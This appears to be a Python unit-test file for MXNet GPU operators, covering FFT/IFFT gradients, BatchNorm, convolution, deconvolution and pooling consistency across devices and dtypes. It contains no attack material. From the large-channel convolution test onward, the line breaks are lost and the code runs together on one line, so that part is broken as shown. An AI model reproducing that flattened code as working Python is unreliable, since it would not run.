        assert_almost_equal(a.real, out1[0] / shape_old[3], rtol=1e-3, atol=1e-12)
    # backward: gradient of ifft w.r.t. its input equals the forward fft of out_grad.
    if len(shape) == 2:
        out_grad = mx.nd.empty(shape_old)
        out_grad[:] = np.random.normal(-3, 3, shape_old)
        for exe in exe_list:
            exe.backward([out_grad])
            temp = exe.grad_arrays[0].asnumpy()
            temp = np.zeros(shape_old)
            # De-interleave: keep only the real components of the computed gradient.
            for i in range(shape_old[1]):
                temp[:, i] = exe.grad_arrays[0].asnumpy()[:, 2 * i]
            a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
            assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
    if len(shape) == 4:
        out_grad = mx.nd.empty(shape_old)
        out_grad[:] = np.random.normal(-3, 3, shape_old)
        for exe in exe_list:
            exe.backward([out_grad])
            temp = exe.grad_arrays[0].asnumpy()
            temp = np.zeros(shape_old)
            for i in range(shape_old[3]):
                temp[:, :, :, i] = exe.grad_arrays[0].asnumpy()[:, :, :, 2 * i]
            a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
            assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)


@with_seed(0)
def test_ifft():
    nrepeat = 2
    maxdim = 10
    for repeat in range(nrepeat):
        for order in [2, 4]:
            shape = tuple(np.random.randint(1, maxdim, size=order))
            check_ifft(shape)


def check_fft(shape):
    # Forward fft of a real input; output interleaves (real, imag) along the last axis.
    sym = mx.sym.contrib.fft(name='fft', compute_size=128)
    if len(shape) == 2:
        if shape[1] % 2 != 0:
            lst = list(shape)
            lst[1] = lst[1] * 2
            shape = tuple(lst)
        shape_old = shape
    if len(shape) == 4:
        if shape[3] % 2 != 0:
            lst = list(shape)
            lst[3] = lst[3] * 2
            shape = tuple(lst)
        shape_old = shape
    init = [np.random.normal(size=shape, scale=1.0)]
    arr_grad = [mx.nd.empty(shape)]
    ctx_list = [{'ctx': mx.gpu(0), 'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
    exe_list = [sym.simple_bind(args_grad=arr_grad, **ctx) for ctx in ctx_list]

    for exe in exe_list:
        for arr, iarr in zip(exe.arg_arrays, init):
            arr[:] = iarr.astype(arr.dtype)
    # forward
    for exe in exe_list:
        exe.forward(is_train=True)
    out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
    out = np.fft.fft(init, n=None, axis=-1, norm=None)
    # Re-interleave numpy's complex output into the op's (re, im, re, im, ...) layout.
    if len(shape) == 2:
        out = np.reshape(out, (out.shape[1], out.shape[2]))
        out2 = np.append(out.real, out.imag, axis=1)
        a = np.zeros(out1[0].shape)
        p = 0
        for i in range(out2.shape[1] // 2):
            a[:, p] = out2[:, i]
            a[:, p + 1] = out2[:, i + out2.shape[1] // 2]
            p = p + 2

    if len(shape) == 4:
        out = np.reshape(out, (out.shape[1], out.shape[2], out.shape[3], out.shape[4]))
        out2 = np.append(out.real, out.imag, axis=1)
        a = np.zeros(out1[0].shape)
        for i in range(out1[0].shape[0]):
            for j in range(out1[0].shape[1]):
                p = 0
                for k in range(out2.shape[3]):
                    a[i, j, :, p] = out2[i, j, :, k]
                    a[i, j, :, p + 1] = out2[i, j + out1[0].shape[1], :, k]
                    p = p + 2

    assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-6)

    # backward: gradient of fft equals the (unnormalized) ifft of out_grad.
    if len(shape) == 2:
        out_grad = mx.nd.empty((shape[0], 2 * shape[1]))
        out_grad[:] = np.random.normal(-3, 3, (shape[0], 2 * shape[1]))
        # out_grad_to_complex
        out_grad_complex = np.zeros(shape, dtype=np.complex64)
        for i in range(0, shape[1]):
            out_grad_complex.real[:, i] = out_grad.asnumpy()[:, 2 * i]
            out_grad_complex.imag[:, i] = out_grad.asnumpy()[:, 2 * i + 1]
        for exe in exe_list:
            exe.backward([out_grad])
            a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
            assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy() / shape[1],
                                rtol=1e-3, atol=1e-8)

    if len(shape) == 4:
        out_grad = mx.nd.empty(out1[0].shape)
        out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
        # out_grad_to_complex
        out_grad_complex = np.zeros(shape, dtype=np.complex64)
        for i in range(0, shape[3]):
            out_grad_complex.real[:, :, :, i] = out_grad.asnumpy()[:, :, :, 2 * i]
            out_grad_complex.imag[:, :, :, i] = out_grad.asnumpy()[:, :, :, 2 * i + 1]
        for exe in exe_list:
            exe.backward([out_grad])
            a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
            assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy() / shape[3],
                                rtol=1e-3, atol=1e-6)


@with_seed(0)
def test_fft():
    nrepeat = 2
    maxdim = 10
    for repeat in range(nrepeat):
        for order in [2, 4]:
            shape = tuple(np.random.randint(1, maxdim, size=order))
            check_fft(shape)


@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10087")
def test_batchnorm_with_type():
    # Cross-check BatchNorm(_v1) outputs across cpu/gpu contexts and float16/32/64 dtypes.
    ctx_list_v1_2D = [
        {'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
    ]

    ctx_list_v2_2D = [
        {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
        {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
    ]

    ctx_list_v2_1D = [
        {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
        {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
    ]

    ctx_list_v2_3D = [
        {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
        {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
        {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
        {'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
    ]

    # V1, 2D
    sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
    check_consistency(sym, ctx_list_v1_2D)
    sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
    check_consistency(sym, ctx_list_v1_2D)

    # V2, 2D
    # NOTE(review): each configuration below is checked twice, verbatim — presumably to
    # exercise repeated-run determinism; confirm before deduplicating.
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_2D)

    # V2, 1D
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_1D)
    #
    #
    # V2, 3D
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_3D)
    sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
    check_consistency(sym, ctx_list_v2_3D)


@with_seed()
def test_batchnorm_versions():
    # Verify that all BatchNorm implementations (v1/v2, cpu/gpu, cudnn on/off) agree.
    def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
        ctx_list = []
        sym_list = []
        # BatchNormV1 cpu
        if 'batchnorm_v1_cpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data,
                             'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
                                                use_global_stats=use_global_stats,
                                                name='batchnorm'))
        # BatchNormV1 gpu (organic)
        if 'batchnorm_v1_gpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data,
                             'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
                                                use_global_stats=use_global_stats,
                                                name='batchnorm'))
        # BatchNorm cpu
        if 'batchnorm_cpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data,
                             'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
                                             use_global_stats=use_global_stats,
                                             name='batchnorm'))
        # BatchNorm gpu (organic)
        if 'batchnorm_gpu' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data,
                             'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
                                             use_global_stats=use_global_stats,
                                             name='batchnorm', cudnn_off=True))
        # BatchNorm gpu cudnn (if cudnn is enabled)
        if 'batchnorm_cudnn' in batchnorm_op_list:
            ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data,
                             'type_dict': {'batchnorm_data': np.float32}})
            sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
                                             use_global_stats=use_global_stats,
                                             name='batchnorm', cudnn_off=False))
        check_consistency(sym_list, ctx_list)

    def test_1d_batchnorm(fix_gamma, use_global_stats):
        data = (2, 3, 20)
        test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu',
                                                          'batchnorm_cudnn'],
                                       data=data, fix_gamma=fix_gamma,
                                       use_global_stats=use_global_stats)

    def test_2d_batchnorm(fix_gamma, use_global_stats):
        data = (2, 3, 10, 10)
        test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
                                                          'batchnorm_cpu', 'batchnorm_gpu',
                                                          'batchnorm_cudnn'],
                                       data=data, fix_gamma=fix_gamma,
                                       use_global_stats=use_global_stats)

    def test_3d_batchnorm(fix_gamma, use_global_stats):
        data = (2, 3, 3, 5, 5)
        test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu'],
                                       data=data, fix_gamma=fix_gamma,
                                       use_global_stats=use_global_stats)

    # Exercise every (fix_gamma, use_global_stats) combination for each dimensionality.
    test_1d_batchnorm(True, False)
    test_1d_batchnorm(False, False)
    test_1d_batchnorm(False, True)
    test_1d_batchnorm(True, True)

    test_2d_batchnorm(True, False)
    test_2d_batchnorm(False, False)
    test_2d_batchnorm(False, True)
    test_2d_batchnorm(True, True)

    test_3d_batchnorm(True, False)
    test_3d_batchnorm(False, False)
    test_3d_batchnorm(False, True)
    test_3d_batchnorm(True, True)


@with_seed(1234)
@assert_raises_cudnn_disabled()
def test_convolution_with_type():
    # Check that Convolution agrees across contexts/dtypes, and that an NHWC convolution
    # (expressed via transposes) matches the NCHW one.
    sym1 = mx.sym.Convolution(num_filter=3, kernel=(3, 3), name='conv')

    data = mx.sym.Variable('conv_data')
    w = mx.sym.Variable('conv_weight')
    b = mx.sym.Variable('conv_bias')
    w = mx.sym.transpose(w, axes=(0, 2, 3, 1))
    sym2 = mx.sym.transpose(data, axes=(0, 2, 3, 1))
    sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3, 3))
    sym2 = mx.sym.transpose(sym2, axes=(0, 3, 1, 2), name='conv')

    sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10),
                 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10),
                 'type_dict': {'conv_data': np.float16}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10),
                 'type_dict': {'conv_data': np.float32}},
                # NHWC
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
                 'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
                 'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
                ]
    # wider tolerance needed for true-fp16 NCHW test above
    tol = {np.dtype(np.float16): 0.5,
           np.dtype(np.float32): 1e-3,
           np.dtype(np.float64): 1e-5,
           np.dtype(np.uint8): 0,
           np.dtype(np.int32): 0}
    check_consistency(sym, ctx_list, tol=tol)
    # test ability to turn off training on bias
    check_consistency(sym, ctx_list,
                      grad_req={'conv_data': 'write', 'conv_weight': 'write',
                                'conv_bias': 'null'}, tol=tol)


# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
    # e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
    # sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
    check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)


@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
    # For each dimensionality and option (pad/stride/dilate/1x1), compare the cudnn and
    # non-cudnn implementations across contexts and dtypes.
    # 1D convolution
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
    # Pad > 0
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Stride > 1
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Dilate > 1
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 1x1 convolution
    sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)

    # 2D convolution
    ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7),
                 'type_dict': {'conv_data': np.float32}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7),
                 'type_dict': {'conv_data': np.float16}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7),
                 'type_dict': {'conv_data': np.float32}}]
    # Pad > 0
    sym = mx.sym.Convolution(num_filter=3, kernel=(3, 3), pad=(1, 1), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3, 3), pad=(1, 1), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Stride > 1
    sym = mx.sym.Convolution(num_filter=3, kernel=(3, 3), stride=(2, 2), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3, 3), stride=(2, 2), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Dilate > 1
    sym = mx.sym.Convolution(num_filter=3, kernel=(3, 3), dilate=(2, 2), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3, 3), dilate=(2, 2), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 1x1 convolution
    sym = mx.sym.Convolution(num_filter=3, kernel=(1, 1), pad=(0, 0), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1, 1), pad=(0, 0), cudnn_off=True,
                                      name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)

    # 3D convolution
    ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7),
                 'type_dict': {'conv_data': np.float64}},
                {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7),
                 'type_dict': {'conv_data': np.float32}}]
    # Pad > 0
    sym = mx.sym.Convolution(num_filter=3, kernel=(2, 3, 3), pad=(1, 1, 1), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2, 3, 3), pad=(1, 1, 1),
                                      cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # Stride > 1
    sym = mx.sym.Convolution(num_filter=3, kernel=(2, 3, 3), stride=(2, 2, 2), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2, 3, 3), stride=(2, 2, 2),
                                      cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
    # 1x1 convolution
    sym = mx.sym.Convolution(num_filter=3, kernel=(1, 1, 1), pad=(0, 0, 0), name='conv')
    sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1, 1, 1), pad=(0, 0, 0),
                                      cudnn_off=True, name='conv')
    check_consistency_NxM([sym, sym_no_cudnn], ctx_list)


# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
    problematic_c = 64 * 1024
    # The convolution accumulates many values, so set large tolerances.
    # NOTE(review): this function continues beyond this chunk of the file.
tol = {np.dtype(np.float32): 1, np.dtype(np.float64): 1} def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() def test_deconvolution_large_c(): problematic_c = 64 * 1024 # The deconvolution accumulates many values, so set large tolerances. 
tol = {np.dtype(np.float32): 1, np.dtype(np.float64): 1} def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv') check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). 
widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) @with_seed() def test_convolution_versions(): # 2D convolution NCHW ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) # 3D convolution NCDHW ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') syms = [conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) @with_seed() def test_pooling_with_type(): ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': 
np.float64}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}] sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool') check_consistency(sym, ctx_list) @with_seed() def test_deconvolution_with_type(): # Test basic deconvolution without exercising stride, pad or dilation. # 1D deconvolution sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, tol=tol) check_consistency(sym, ctx_list, tol=tol, grad_req="add") # 2D deconvolution sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 
'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, tol=tol) check_consistency(sym, ctx_list, tol=tol, grad_req="add") @with_seed() def test_deconvolution_options(): # 1D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv') sym_no_cudnn = 